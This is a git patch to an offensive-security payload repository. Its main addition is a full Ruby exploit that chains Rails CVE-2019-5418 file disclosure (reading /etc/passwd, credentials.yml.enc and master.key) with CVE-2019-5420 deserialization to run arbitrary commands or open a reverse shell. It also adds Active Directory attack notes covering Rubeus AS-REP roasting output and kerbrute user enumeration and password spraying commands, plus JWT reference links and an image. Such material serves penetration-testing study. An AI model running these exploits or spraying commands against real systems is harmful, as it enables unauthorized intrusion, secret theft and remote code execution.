From 5d1b8bca79a4efc422a4cd809bfe86a81ba74f82 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sun, 24 Mar 2019 13:16:23 +0100
Subject: [PATCH] SAML exploitation + ASREP roasting + Kerbrute

---
 CVE Exploits/Rails CVE-2019-5420.rb           | 156 ++++++++++++++++
 JSON Web Token/README.md                      |   6 +-
 .../Active Directory Attack.md                |  54 ++++++
 SAML Injection/Images/SAML-xml-flaw.png       | Bin 0 -> 8907 bytes
 SAML Injection/README.md                      | 168 ++++++++++++++++++
 _template_vuln/README.md                      |  11 +-
 6 files changed, 389 insertions(+), 6 deletions(-)
 create mode 100644 CVE Exploits/Rails CVE-2019-5420.rb
 create mode 100644 SAML Injection/Images/SAML-xml-flaw.png
 create mode 100644 SAML Injection/README.md

diff --git a/CVE Exploits/Rails CVE-2019-5420.rb b/CVE Exploits/Rails CVE-2019-5420.rb
new file mode 100644
index 0000000..647f03f
--- /dev/null
+++ b/CVE Exploits/Rails CVE-2019-5420.rb	
@@ -0,0 +1,156 @@
+require 'erb'
+require "./demo-5.2.1/config/environment"
+require "base64"
+require 'net/http'
+
+$proxy_addr = '127.0.0.1'
+$proxy_port = 8080
+
+$remote = "http://172.18.0.3:3000"
+$ressource = "/demo"
+
+puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n"
+
+print "[+] Checking if vulnerable to CVE-2019-5418 => "
+uri = URI($remote + $ressource)
+req = Net::HTTP::Get.new(uri)
+req['Accept'] = "../../../../../../../../../../etc/passwd{{"
+res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
+  http.request(req)
+}
+if res.body.include? "root:x:0:0:root:"
+   puts "\033[92mOK\033[0m"
+else
+    puts "KO"
+    abort
+end
+
+print "[+] Getting file => credentials.yml.enc => "
+path = "../../../../../../../../../../config/credentials.yml.enc{{"
+for $i in 0..9
+    uri = URI($remote + $ressource)
+    req = Net::HTTP::Get.new(uri)
+    req['Accept'] = path[3..57]
+    res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
+        http.request(req)
+    }
+    if res.code == "200"
+        puts "\033[92mOK\033[0m"
+        File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) }
+        break
+    end
+    path = path[3..57]
+    $i +=1;
+end
+
+print "[+] Getting file => master.key => "
+path = "../../../../../../../../../../config/master.key{{"
+for $i in 0..9
+    uri = URI($remote + $ressource)
+    req = Net::HTTP::Get.new(uri)
+    req['Accept'] = path[3..57]
+    res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
+        http.request(req)
+    }
+    if res.code == "200"
+        puts "\033[92mOK\033[0m"
+        File.open("master.key", 'w') { |file| file.write(res.body) }
+        break
+    end
+    path = path[3..57]
+    $i +=1;
+end
+
+print "[+] Decrypt secret_key_base => "
+credentials_config_path = File.join("../", "credentials.yml.enc")
+credentials_key_path = File.join("../", "master.key")
+ENV["RAILS_MASTER_KEY"] = res.body
+credentials = ActiveSupport::EncryptedConfiguration.new(
+    config_path: Rails.root.join(credentials_config_path),
+    key_path: Rails.root.join(credentials_key_path),
+    env_key: "RAILS_MASTER_KEY",
+    raise_if_missing_key: true
+)
+if credentials.secret_key_base != nil
+    puts "\033[92mOK\033[0m"
+    puts ""
+    puts "secret_key_base": credentials.secret_key_base
+    puts ""
+end
+
+puts "[+] Getting reflective command (R) or reverse shell (S) => "
+loop do 
+    begin
+        input = [(print 'Select option R or S: '), gets.rstrip][1]
+        if input == "R"
+            puts "Reflective command selected"
+            command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1]
+        elsif input == "S"
+            puts "Reverse shell selected"
+            command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1]
+        else
+            puts "No option selected"
+            abort
+        end
+
+        command_b64 = Base64.encode64(command)
+
+        print "[+] Generating payload CVE-2019-5420 => "
+        secret_key_base = credentials.secret_key_base
+        key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
+        secret = key_generator.generate_key("ActiveStorage")
+        verifier = ActiveSupport::MessageVerifier.new(secret)
+        if input == "R"
+            code = "system('bash','-c','" + command + " > /tmp/result.txt')"
+        else
+            code = "system('bash','-c','" + command + "')"
+        end 
+        erb = ERB.allocate
+        erb.instance_variable_set :@src, code
+        erb.instance_variable_set :@filename, "1"
+        erb.instance_variable_set :@lineno, 1
+        dump_target  = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
+
+        puts "\033[92mOK\033[0m"
+        puts ""
+        url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test"
+        puts url
+        puts ""
+
+        print "[+] Sending request => "
+        uri = URI(url)
+        req = Net::HTTP::Get.new(uri)
+        req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+        res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
+        http.request(req)
+        }
+        if res.code == "500"
+            puts "\033[92mOK\033[0m"
+        else
+            puts "KO"
+            abort
+        end
+
+        if input == "R"
+            print "[+] Getting result of command => "
+            uri = URI($remote + $ressource)
+            req = Net::HTTP::Get.new(uri)
+            req['Accept'] = "../../../../../../../../../../tmp/result.txt{{"
+            res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
+            http.request(req)
+            }
+            if res.code == "200"
+                puts "\033[92mOK\033[0m\n\n"
+                puts res.body
+                puts "\n"
+            else
+                puts "KO"
+                abort
+            end
+        end
+        
+    rescue Exception => e
+        puts "Exiting..."
+        abort
+    end
+end
diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md
index 6a89ce3..3e88b88 100644
--- a/JSON Web Token/README.md	
+++ b/JSON Web Token/README.md	
@@ -13,6 +13,7 @@
 
 - [jwt_tool](https://github.com/ticarpi/jwt_tool)
 - [c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker)
+- [JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61)
 
 ## JWT Format
 
@@ -227,4 +228,7 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
 - [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
 - [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens)
-- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
\ No newline at end of file
+- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
+- [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
+- [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
+- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
\ No newline at end of file
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 1847667..0dad93f 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -13,6 +13,7 @@
   * [Silver Tickets](#passtheticket-silver-tickets)
   * [Trust Tickets](#trust-tickets)
   * [Kerberoast](#kerberoast)
+  * [KRB_AS_REP roasting](#krb_as_rep-roasting)
   * [Pass-the-Hash](#pass-the-hash)
   * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
   * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
@@ -20,6 +21,7 @@
   * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
   * [Trust relationship between domains](#trust-relationship-between-domains)
   * [PrivExchange attack](#privexchange-attack)
+  * [Password spraying](#password-spraying)
 * [Privilege Escalation](#privilege-escalation)
   * [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato)
   * [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
@@ -74,6 +76,12 @@
     pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
     ```
 
+* [Kerbrute](https://github.com/ropnop/kerbrute)
+
+    ```powershell
+    ./kerbrute passwordspray -d <DOMAIN> <USERS.TXT> <PASSWORD>
+    ```
+
 ## Most common paths to AD compromise
 
 ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
@@ -380,6 +388,42 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt
 ./john ~/hash.txt --wordlist=rockyou.lst
 ```
 
+### KRB_AS_REP Roasting
+
+If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
+
+```powershell
+C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
+C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
+
+ ______        _
+(_____ \      | |
+ _____) )_   _| |__  _____ _   _  ___
+|  __  /| | | |  _ \| ___ | | | |/___)
+| |  \ \| |_| | |_) ) ____| |_| |___ |
+|_|   |_|____/|____/|_____)____/(___/
+
+v1.3.4
+
+
+[*] Action: AS-REP roasting
+
+[*] Target User            : TestOU3user
+[*] Target Domain          : testlab.local
+
+[*] SamAccountName         : TestOU3user
+[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
+[*] Using domain controller: testlab.local (192.168.52.100)
+[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
+[*] Connecting to 192.168.52.100:88
+[*] Sent 169 bytes
+[*] Received 1437 bytes
+[+] AS-REQ w/o preauth successful!
+[*] AS-REP hash:
+
+    $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
+```
+
 ### Pass-the-Hash
 
 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
@@ -498,6 +542,16 @@ Alternatively you can use the Metasploit module
 
 [`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
 
+### Password spraying
+
+Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
+
+```powershell
+root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
+root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
+```
+
+
 ## Privilege Escalation
 
 ### PrivEsc Local Admin - Token Impersonation (RottenPotato)
diff --git a/SAML Injection/Images/SAML-xml-flaw.png b/SAML Injection/Images/SAML-xml-flaw.png
new file mode 100644
index 0000000000000000000000000000000000000000..b014a49b58018ee8c862d09017359992bb140a0d
GIT binary patch
literal 8907
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%0DmiYy36*sgBdc!t^2-RRMS%uM&rc6hW)RwdM
z)NRC4R339l`F7MtJWR!{e8<wh@_jzK!7b+`>*`0(QYx<AYLSzFH!w1sCOy#9V%aNy
z9+uma+4S_uq`swLQgFJgrwfnUCMO988QNva<FRc;fP`(qZ0p8-S;Cj5Lem)S04>j-
z0X+_D?@y)MhVC{0b-xtpXn2LmmheA-SP9wgSb#pi8xF|A6nM@$^^_&qiAXe6#)~v^
zGf|q&#;j*tp1Cw|^lfC_O0sfQt3JpFKLUME<>_j9TLUL?uZ5Ag^9U-_uTwa6%9C-q
zDx$dGB!y-=M}Y@lma9lB9cLay+UT2YFj&i@34UOve|r=qe-y=(;Gfg=<;H(dK>6=_
zEWC;At}UjhON2Me*ib?3q^BOzun*jHjxv~;1iu(G@6nOWcG$^fGWH+TDtB`n568?6
zezL<b>#MuE45|0zUQlOQkb=sq?L9;1duE<ZW40tDnzHTHP_;|eJG{1^c5?%5?l$u!
z1eeFZ{&HSCyQ5KVEMd10Olj*{H#_V(JEShbvO=|_84@=bHN(e}Nr?UcMKz7FvZs?_
zG5WMqq=y!z#>N%w{JeM3#V<{?a!V@j`jauKANFfFmgu9329LYZj-Xr<!J`*}ba9>3
z2oi4e3I&#pU8=^McA5lX*}SqMgW%{2^tZu|`G{0YSc<2or9J@r`jBAX3)9iZ|9I=~
z*Tomn7wx1;XPyKeCVZbLT$AuD7Lwzz(`WwWH<$@ucXPhW@E1=~9rODU)5bc6+N4bv
z`g#oZVS;OO(t=MEW}E~;;f!|ip@EM!rwo_cJVuX{|G3Zhjl!XBz&YJJ6*FFEeENH*
zQLgHcB02O<)P^blKss7rocDIVj=11mZsO=C7F^EGT`bh-?q`Z#%lUVFADjfCgRuHM
zbPBm$gp6H5VbaPEu2ha;>!O=BWY{)y+Q+wL2>y)Hv-qP)e{{?6f=_EFJ1N+4^9j)m
zo>CDchx4k+eP7>m@V(_?y~7&i)I^M})RC0#Rq!JFLl@#fnT0PlTea)*amSWu?)3nv
